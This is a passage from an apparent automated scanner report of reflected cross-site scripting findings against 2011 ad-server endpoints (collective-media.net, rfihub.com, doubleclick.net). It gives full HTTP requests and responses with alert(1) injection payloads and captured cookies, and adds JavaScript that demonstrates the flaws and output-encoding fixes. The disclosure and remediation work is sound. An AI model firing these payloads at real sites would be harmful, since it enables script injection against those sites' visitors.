Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; rdst4=1; rdst3=1; rdst7=1; rdst8=1; dp1=1; JY57=3j3C2c4UgMCi1w9hoE4sZ6cfql-2xzRl2eFEPSm8obK8tRi7bcg1RNg; targ=1; dp2=1; nadp=1; rdst11=1; rdst12=1; apnx=1; qcms=1; blue=1; qcdp=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 447
Date: Mon, 14 Feb 2011 02:10:20 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 16-Mar-2011 02:10:20 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.drudgerep/;sz=300x250;net=cm;ord=$cacheBuster$&d4b37'-alert(1)-'600aca90b1e=1;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

3.9. http://a.collective-media.net/adj/cm.drudgerep/ [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.drudgerep/

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1b527'-alert(1)-'c296858d3f2 was submitted in the sz parameter. This input was echoed unmodified in the application's response. As the request below shows, the scanner treats everything from sz= to the end of the request line as that parameter's value, so the payload lands after ord=$cacheBuster$ rather than directly after 300x250; it is reflected into the same document.write string either way.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.drudgerep/;sz=300x250;click0=;ord=$cacheBuster$1b527'-alert(1)-'c296858d3f2 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; rdst4=1; rdst3=1; rdst7=1; rdst8=1; dp1=1; JY57=3j3C2c4UgMCi1w9hoE4sZ6cfql-2xzRl2eFEPSm8obK8tRi7bcg1RNg; targ=1; dp2=1; nadp=1; rdst11=1; rdst12=1; apnx=1; qcms=1; blue=1; qcdp=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 444
Date: Mon, 14 Feb 2011 02:10:20 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 16-Mar-2011 02:10:20 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.drudgerep/;sz=300x250;net=cm;ord=$cacheBuster$1b527'-alert(1)-'c296858d3f2;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...
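
The findings 3.3 through 3.9 all hit the same template: a server-side string builds a document.write('<scr'+'ipt ... src="http://k.collective-media.net/cmadj/' + path + '...">') call, and anything in the path containing a single quote terminates the literal. The block below is an added example, not code from the report or from collective-media.net: it reconstructs an approximation of that template with the 3.3 payload, shows the string literal being broken, and then applies the two-layer fix (percent-encode each path segment for the URL, then hex-escape for the JavaScript string). The template text, the stub document/alert objects and the function names are constructed here. The same jsStringEscape also covers the double-quoted variants reported for ad.doubleclick.net in 3.11 through 3.14.

```javascript
// Added example (not part of the scanner report): the collective-media.net
// /adj template from findings 3.3-3.9 builds a document.write() call whose
// single-quoted string contains the request path. The payload below is the
// one reported for 3.3; the template text is a constructed approximation.
const SLOT_PAYLOAD = "cm.dailymail2dc11'-alert(1)-'c06cd63375f/ron_052010";
const SLOT_BENIGN = "cm.dailymail/ron_052010";

// Vulnerable pattern: raw concatenation into a JS string literal.
function vulnerableAdScript(slot) {
  return "document.write('<scr'+'ipt src=\"http://k.collective-media.net/cmadj/"
    + slot + ";sz=300x250\">');";
}

// Layer 1: the value is a URL path, so percent-encode each segment. Note that
// encodeURIComponent leaves ' ( ) alone, which is why layer 2 is still needed.
function encodeSlotPath(slot) {
  return String(slot).split('/').map(encodeURIComponent).join('/');
}

// Layer 2: hex-escape everything outside a conservative allow-list so no
// character can terminate the JS string literal or form a </script> tag.
function jsStringEscape(s) {
  return String(s).replace(/[^A-Za-z0-9 _.,%\-\/:;=?&]/g, (ch) => {
    const code = ch.charCodeAt(0);
    return code < 0x100
      ? '\\x' + code.toString(16).padStart(2, '0')
      : '\\u' + code.toString(16).padStart(4, '0');
  });
}

// Hardened pattern: same template, value encoded for both contexts it lands in.
function hardenedAdScript(slot) {
  return "document.write('<scr'+'ipt src=\"http://k.collective-media.net/cmadj/"
    + jsStringEscape(encodeSlotPath(slot)) + ";sz=300x250\">');";
}

// Execute a generated script against stub document/alert objects and record
// what happened; this is what a browser would do with the real response.
function run(script) {
  const result = { alerts: 0, written: [] };
  const fakeDocument = { write: (html) => result.written.push(html) };
  const fakeAlert = () => { result.alerts += 1; };
  new Function('document', 'alert', script)(fakeDocument, fakeAlert);
  return result;
}

// Usage: the vulnerable script fires alert() and writes NaN (the string
// arithmetic that the broken literal turns into); the hardened one writes the
// intended <script> tag with the payload kept inert as data.
console.log('vulnerable:', run(vulnerableAdScript(SLOT_PAYLOAD)));
console.log('hardened:  ', run(hardenedAdScript(SLOT_PAYLOAD)));
console.log('benign:    ', run(hardenedAdScript(SLOT_BENIGN)));
```

The allow-list in jsStringEscape is deliberately narrow: it keeps only the characters a slot path and the `;sz=...;ord=...` matrix parameters legitimately need. Escaping the quote alone would not be enough, because the value is decoded back into an HTML attribute by document.write, which is why the URL-encoding layer runs first.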

3.10. http://a.rfihub.com/sed [pa parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.rfihub.com
Path:   /sed

Issue detail

The value of the pa request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7e6c4'><script>alert(1)</script>cd7c8900c9b was submitted in the pa parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sed?w=728&h=90&re=19969&pv=0&ra=6473367370.8131766689475626&rb=445&ca=&rc=10.2&rd=&ua=&ub=&uc=&ud=&ue=&pa=ppre6473367353167e6c4'><script>alert(1)</script>cd7c8900c9b&pb=&pc=&pd=&pg=&ct=1297647336737&pe=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-dyn%2Fcontent%2Farticle%2F2011%2F02%2F13%2FAR2011021301463.html&pf=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-dyn%2Fcontent%2Farticle%2F2011%2F02%2F13%2FAR2011021301463.html HTTP/1.1
Host: a.rfihub.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: a1=1CAESEDwKxKPrWufjyLofYqzf4_4; t=1296740537347; a=c369013694478760033; o=1-BjMxrfcI6jt9; r=1296740536014; k="aAJBlvOUA==AGnmc809AN1288024309000AAABLgCILYI=AGnmc801AN1288021692000AAABLgCILYI=AGnmc829AN1288026445000AAABLgCILYI=AGnmc736AN1288018708000AAABLgCILYI=AGnmc805AN1288021876000AAABLgCILYI=AGnmc825AN1288026116000AAABLgCILYI=AGnmc773AN1288019600000AAABLgCILYI=AGnmc747AN1288024980000AAABLgCILYI=AGnmc748AN1288024901000AAABLgCILYI="; s="aAE-DNNhg==AE9479AN1294103956000AAABLgq3o_Y=AF12446AN1285279980000AAABLgq3o_Y=AE9438AN1273618082000AAABLgBpdhw=AE8438AN1275963655000AAABLgBpdhw="; b="aAMN9qejw==AD741AAABLgrfWIY=AD793AAABLgrfWIY=AD809AAABLgrfWIY=AD825AAABLgrfWIY=AD736AAABLgrfWIY=AD781AAABLgrfWIY=AD829AAABLgrfWIY=AD748AAABLgrfWIY=AD801AAABLgrfWIY=AD773AAABLgrfWIY=AD747AAABLgrfWIY=AD805AAABLgBphCs="; m="aAGRcyqzg==AI20472726AAABLgrfWIc=AI20472726AAABLgrTunc=AI20472726AAABLgq3K4s=AI20472726AAABLgBphCw=AI20472701AAABLffM4Y0=AI20472701AAABLevCTs8="; g="aAG9rzUwA==A_aBXkOpUe5j7vA|15706|73437|68086|14121|1243|92405|445|32981|7792AAABLhsS7_s=A_akezhu0C40Skt|15706|73437|68086|14121|1243|92405|445|32981|7792AAABLhsSR2I=A_a2pwDXuoO-PeR|15705|73433|68086|14121|1243|92574|445|32521|7792AAABLgq3o_o=A_a9RXWgJTWnNNS|14969|69553|60848|13007|1144|90136|306|32226|7317AAABLgCILYY=A_aFWCVjo6agoYc|16569|76934|70571|14534|1277|92574|445|32490|7755AAABLgBpfaE=A9aTqK7H67WacJ_|9542|45408|51494|13737|830|92405|445|29513|7557AAABLgBpdh8="; 
c="aAh4fa6Qg==AFd1243AB3AAABLhsS7_c=AFv2946AB3AAABLhsS7_c=AGu14941AB3AAABLhsS7_c=AFc1243AB3AAABLhsS7_c=AFl2946AB3AAABLhsS7_c=AGt14941AB3AAABLhsS7_c=AGb15706AB2AAABLhsS7_c=AGa15706AB2AAABLhsS7_c=AGb15705AB1AAABLgq3o_Y=AGa15705AB1AAABLgq3o_Y=AFd1144AB1AAABLgCILYI=AFv2383AB1AAABLgCILYI=AGu11341AB1AAABLgCILYI=AFc1144AB1AAABLgCILYI=AFl2383AB1AAABLgCILYI=AGb14969AB1AAABLgCILYI=AGa14969AB1AAABLgCILYI=AFd1277AB1AAABLgBpfZ4=AFv3000AB1AAABLgBpfZ4=AGu15506AB1AAABLgBpfZ4=AFc1277AB1AAABLgBpfZ4=AFl3000AB1AAABLgBpfZ4=AGt15506AB1AAABLgBpfZ4=AGb16569AB1AAABLgBpfZ4=AGa16569AB1AAABLgBpfZ4=AEd830AB1AAABLgBpdhw=AFv1265AB1AAABLgBpdhw=AFu5385AB1AAABLgBpdhw=AEc830AB1AAABLgBpdhw=AFl1265AB1AAABLgBpdhw=AFt5385AB1AAABLgBpdhw=AFb9542AB1AAABLgBpdhw=AFa9542AB1AAABLgBpdhw="; f="aAFSdsTtQ==AK1297534306AB2AAABLhsS7_c=AK1297259930AB2AAABLgrfWIY=AK1297087034AB4AAABLgCILYI=AK1296942555AB1AAABLffM4Y0=AK1296740536AB1AAABLevCTs4="; e=cd

Response

HTTP/1.1 200 OK
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Content-Type: text/html; charset=iso-8859-1
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: g="aAHN7Dy1Q==A_ax3hqHhIaQ7kH|15705|73433|68086|14121|1243|92574|445|32981|7792AAABLiHOrUw=A_aBXkOpUe5j7vA|15706|73437|68086|14121|1243|92405|445|32981|7792AAABLhsS7_s=A_akezhu0C40Skt|15706|73437|68086|14121|1243|92405|445|32981|7792AAABLhsSR2I=A_a2pwDXuoO-PeR|15705|73433|68086|14121|1243|92574|445|32521|7792AAABLgq3o_o=A_a9RXWgJTWnNNS|14969|69553|60848|13007|1144|90136|306|32226|7317AAABLgCILYY=A_aFWCVjo6agoYc|16569|76934|70571|14534|1277|92574|445|32490|7755AAABLgBpfaE=A9aTqK7H67WacJ_|9542|45408|51494|13737|830|92405|445|29513|7557AAABLgBpdh8=";Path=/;Domain=.rfihub.com;Expires=Wed, 15-Aug-12 01:35:16 GMT
Set-Cookie: c="aAh0Fw84g==AFd1243AB4AAABLiHOrUg=AFv2946AB4AAABLiHOrUg=AGu14941AB4AAABLiHOrUg=AFc1243AB4AAABLiHOrUg=AFl2946AB4AAABLiHOrUg=AGt14941AB4AAABLiHOrUg=AGb15705AB2AAABLiHOrUg=AGa15705AB2AAABLiHOrUg=AGb15706AB2AAABLhsS7_c=AGa15706AB2AAABLhsS7_c=AFd1144AB1AAABLgCILYI=AFv2383AB1AAABLgCILYI=AGu11341AB1AAABLgCILYI=AFc1144AB1AAABLgCILYI=AFl2383AB1AAABLgCILYI=AGb14969AB1AAABLgCILYI=AGa14969AB1AAABLgCILYI=AFd1277AB1AAABLgBpfZ4=AFv3000AB1AAABLgBpfZ4=AGu15506AB1AAABLgBpfZ4=AFc1277AB1AAABLgBpfZ4=AFl3000AB1AAABLgBpfZ4=AGt15506AB1AAABLgBpfZ4=AGb16569AB1AAABLgBpfZ4=AGa16569AB1AAABLgBpfZ4=AEd830AB1AAABLgBpdhw=AFv1265AB1AAABLgBpdhw=AFu5385AB1AAABLgBpdhw=AEc830AB1AAABLgBpdhw=AFl1265AB1AAABLgBpdhw=AFt5385AB1AAABLgBpdhw=AFb9542AB1AAABLgBpdhw=AFa9542AB1AAABLgBpdhw=";Path=/;Domain=.rfihub.com;Expires=Wed, 15-Aug-12 01:35:16 GMT
Set-Cookie: f="aAGmgjuLw==AK1297647316AB1AAABLiHOrUg=AK1297534306AB2AAABLhsS7_c=AK1297259930AB2AAABLgrfWIY=AK1297087034AB4AAABLgCILYI=AK1296942555AB1AAABLffM4Y0=AK1296740536AB1AAABLevCTs4=";Path=/;Domain=.rfihub.com;Expires=Wed, 15-Aug-12 01:35:16 GMT
Set-Cookie: e=cb;Path=/;Domain=.rfihub.com;Expires=Wed, 15-Aug-12 01:35:16 GMT
Content-Length: 2175

<html><body><span id="__rfi" style="height:0px; width:0px"><IFRAME SRC="http://ad.doubleclick.net/adi/N3740.270604.B3/B5123509.61;sz=728x90;pc=[TPAS_ID];ord=1297647316296;click=http://a.rfihub.com/aci
...[SNIP]...
border=0 width=0 height=0 src='http://a.rfihub.com/tk.gif?rb=445&re=19969&aa=15705,73433,14121,68086,1243,14941,x3hqHhIaQ7kH,http%3A%2F%2Frocketfuelinc.com,776,2946,32981,1879,7792&pa=ppre6473367353167e6c4'><script>alert(1)</script>cd7c8900c9b&id=&ra=6473163000.11331372547018437'>
...[SNIP]...
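
Findings 3.2 and 3.10 are the two HTML contexts in this section: 3.2 echoes the request path as text inside a text/html 404 body, and 3.10 places the pa value inside a single-quoted src attribute, where `'>` closes the tag. The block below is an added example, not code from the report or from either vendor; it reconstructs an approximation of each response fragment using the payloads the report shows, and contrasts raw concatenation with output encoding for the context the value lands in. The markup, the htmlEncode helper and the tagNames tokenizer are constructed here.

```javascript
// Added example (not part of the scanner report): output encoding for the two
// HTML contexts seen in findings 3.2 (path echoed as text in a text/html 404)
// and 3.10 (pa value echoed inside a single-quoted src attribute). The payloads
// are the ones the report shows; the surrounding markup is a constructed
// approximation of the captured responses.
const TEXT_PAYLOAD = "/ad91f06<script>alert(1)</script>bbd480d1b59/cm.drudgerep/";
const ATTR_PAYLOAD = "7e6c4'><script>alert(1)</script>cd7c8900c9b";

// Encode the five characters that can change meaning in HTML text or in a
// quoted attribute value. &#x27; is used for ' because &apos; is not HTML 4.
function htmlEncode(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(s).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Finding 3.2: the 404 handler concatenates the request path into the body.
function notFoundBodyVulnerable(path) {
  return 'unknown path ' + path;
}
function notFoundBodyHardened(path) {
  return 'unknown path ' + htmlEncode(path);
}

// Finding 3.10: the pa value becomes part of a URL inside src='...'. Encode it
// for the URL first (encodeURIComponent leaves ' alone), then for the attribute.
function pixelTagVulnerable(pa) {
  return "<img border=0 width=0 height=0 src='http://a.rfihub.com/tk.gif?pa=" + pa + "'>";
}
function pixelTagHardened(pa) {
  return "<img border=0 width=0 height=0 src='http://a.rfihub.com/tk.gif?pa="
    + htmlEncode(encodeURIComponent(pa)) + "'>";
}

// Minimal tokenizer: the element names a browser would parse out of a fragment.
// Good enough to show whether an injected <script> survived, not a real parser.
function tagNames(html) {
  return Array.from(html.matchAll(/<\/?([A-Za-z][A-Za-z0-9]*)/g), (m) => m[1].toLowerCase());
}

// Usage: vulnerable fragments contain a script element, hardened ones do not.
console.log('3.2  raw:     ', tagNames(notFoundBodyVulnerable(TEXT_PAYLOAD)));
console.log('3.2  encoded: ', tagNames(notFoundBodyHardened(TEXT_PAYLOAD)));
console.log('3.10 raw:     ', tagNames(pixelTagVulnerable(ATTR_PAYLOAD)));
console.log('3.10 encoded: ', tagNames(pixelTagHardened(ATTR_PAYLOAD)));
```

For 3.1 and 3.2 there is also a simpler fix: stop serving the error as text/html at all. A text/plain body sent with X-Content-Type-Options: nosniff has no HTML context to inject into. For 3.10 the attribute encoding matters even after URL encoding, because encodeURIComponent leaves the single quote untouched and it is the quote that closes the attribute.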

3.11. http://ad.doubleclick.net/adi/N3740.270604.B3/B5123509.61 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3740.270604.B3/B5123509.61

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dc59a"-alert(1)-"ed8a505e8a7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3740.270604.B3/B5123509.61;sz=728x90;pc=[TPAS_ID];ord=1297647300104;click=http://a.rfihub.com/aci/124_0_YWE9MTU3MDUsNzM0MzMsMTQxMjEsNjgwODYsMTI0MywxNDk0MSxjeVk4UkM5UTJ5TVAscCw3NzYsMjk0NiwzMjk4MSwxODc5LDc3OTImcmI9NDQ1JnJlPTE5OTY5&dc59a"-alert(1)-"ed8a505e8a7=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/sed?w=728&h=90&re=19969&pv=0&ra=6473367370.8131766689475626&rb=445&ca=&rc=10.2&rd=&ua=&ub=&uc=&ud=&ue=&pa=ppre647336735316&pb=&pc=&pd=&pg=&ct=1297647336737&pe=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-dyn%2Fcontent%2Farticle%2F2011%2F02%2F13%2FAR2011021301463.html&pf=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-dyn%2Fcontent%2Farticle%2F2011%2F02%2F13%2FAR2011021301463.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 14 Feb 2011 01:36:01 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6107

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,082 Template Name = 2. Banner Creative (Flash) - In Pa
...[SNIP]...
okv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://a.rfihub.com/aci/124_0_YWE9MTU3MDUsNzM0MzMsMTQxMjEsNjgwODYsMTI0MywxNDk0MSxjeVk4UkM5UTJ5TVAscCw3NzYsMjk0NiwzMjk4MSwxODc5LDc3OTImcmI9NDQ1JnJlPTE5OTY5&dc59a"-alert(1)-"ed8a505e8a7=1http%3a%2f%2ft.mookie1.com/t/v1/clk%3FmigAgencyId%3D188%26migSource%3Dadsrv2%26migTrackDataExt%3D2426847%3B58824910%3B234278619%3B39992677%26migRandom%3D2161819%26migTrackFmtExt%3Dclient%3Bio%3Bad%3B
...[SNIP]...

3.12. http://ad.doubleclick.net/adi/N3740.270604.B3/B5123509.61 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3740.270604.B3/B5123509.61

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bcff3"-alert(1)-"0f153e75e05 was submitted in the sz parameter. This input was echoed unmodified in the application's response. As the request below shows, the scanner treats everything from sz= to the end of the request line as that parameter's value, so the payload is appended after the click= URL rather than directly after 728x90; it is reflected into the same JavaScript string either way.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3740.270604.B3/B5123509.61;sz=728x90;pc=[TPAS_ID];ord=1297647300104;click=http://a.rfihub.com/aci/124_0_YWE9MTU3MDUsNzM0MzMsMTQxMjEsNjgwODYsMTI0MywxNDk0MSxjeVk4UkM5UTJ5TVAscCw3NzYsMjk0NiwzMjk4MSwxODc5LDc3OTImcmI9NDQ1JnJlPTE5OTY5bcff3"-alert(1)-"0f153e75e05 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/sed?w=728&h=90&re=19969&pv=0&ra=6473367370.8131766689475626&rb=445&ca=&rc=10.2&rd=&ua=&ub=&uc=&ud=&ue=&pa=ppre647336735316&pb=&pc=&pd=&pg=&ct=1297647336737&pe=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-dyn%2Fcontent%2Farticle%2F2011%2F02%2F13%2FAR2011021301463.html&pf=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-dyn%2Fcontent%2Farticle%2F2011%2F02%2F13%2FAR2011021301463.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 14 Feb 2011 01:35:45 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6007

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,082 Template Name = 2. Banner Creative (Flash) - In Pa
...[SNIP]...
Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://a.rfihub.com/aci/124_0_YWE9MTU3MDUsNzM0MzMsMTQxMjEsNjgwODYsMTI0MywxNDk0MSxjeVk4UkM5UTJ5TVAscCw3NzYsMjk0NiwzMjk4MSwxODc5LDc3OTImcmI9NDQ1JnJlPTE5OTY5bcff3"-alert(1)-"0f153e75e05http://t.mookie1.com/t/v1/clk?migAgencyId=188&migSource=adsrv2&migTrackDataExt=2426847;58824910;234278619;39992677&migRandom=2145756&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://www.univers
...[SNIP]...

3.13. http://ad.doubleclick.net/adi/N4270.Media6Degrees.com/B5094437.9 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4270.Media6Degrees.com/B5094437.9

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 57a15"-alert(1)-"a5169947ca5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N4270.Media6Degrees.com/B5094437.9;sz=300x250;ord=1297649785346;click0=http://ad.media6degrees.com/adserv/clk?tId=4401087500065260|cId=5193|cb=1297649784|notifyPort=8080|exId=23|tId=4401087500065260|ec=1|secId=859|price=AAABLiH0WMa4m9TZK-nhGAJNtNF-bSex1RpF1w|pubId=300|advId=891|notifyServer=asd116.sd.pl.pvt|spId=26917|adType=iframe|invId=3159|bid=1.53|ctrack=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLzQ3CMAwG0I9fReoaXC01rlM3Q3DgxtVN7BkYo1sxDhITUN79DTgAuInzOvMk1EYeSbxnqqsUWqo3iwhW14Tj_bm9Bpz-YzIu2jLTomb7qEwWcyYX7UWYe419nAHlhAvwfSRcgfcHP_GHBIVzAAAA%26dst%3Dhttp%253A%252F%252Fwww.adobe.com%252Fproducts%252Fcreativesuite%252Fdesign%252F%253Fsdid%253DIEFXK&57a15"-alert(1)-"a5169947ca5=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.media6degrees.com/adserv/cs?tId=4401087500065260|cb=1297649784|adType=iframe|cId=5193|ec=1|spId=26917|advId=891|exId=23|price=AAABLiH0WMa4m9TZK-nhGAJNtNF-bSex1RpF1w|pubId=300|secId=859|invId=3159|notifyServer=asd116.sd.pl.pvt|notifyPort=8080|bid=1.53|srcUrlEnc=http%3A%2F%2Fwww.drudgereport.com%2F|ctrack=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLzQ3CMAwG0I9fReoaXC01rlM3Q3DgxtVN7BkYo1sxDhITUN79DTgAuInzOvMk1EYeSbxnqqsUWqo3iwhW14Tj_bm9Bpz-YzIu2jLTomb7qEwWcyYX7UWYe419nAHlhAvwfSRcgfcHP_GHBIVzAAAA%26dst%3Dhttp%253A%252F%252Fwww.adobe.com%252Fproducts%252Fcreativesuite%252Fdesign%252F%253Fsdid%253DIEFXK
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 14 Feb 2011 02:17:01 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7933

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
zOvMk1EYeSbxnqqsUWqo3iwhW14Tj_bm9Bpz-YzIu2jLTomb7qEwWcyYX7UWYe419nAHlhAvwfSRcgfcHP_GHBIVzAAAA%26dst%3Dhttp%253A%252F%252Fwww.adobe.com%252Fproducts%252Fcreativesuite%252Fdesign%252F%253Fsdid%253DIEFXK&57a15"-alert(1)-"a5169947ca5=1http://www.adobe.com/products/creativesuite/design?sdid=IEFXK");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var o
...[SNIP]...

3.14. http://ad.doubleclick.net/adi/N4270.Media6Degrees.com/B5094437.9 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4270.Media6Degrees.com/B5094437.9

Issue detail

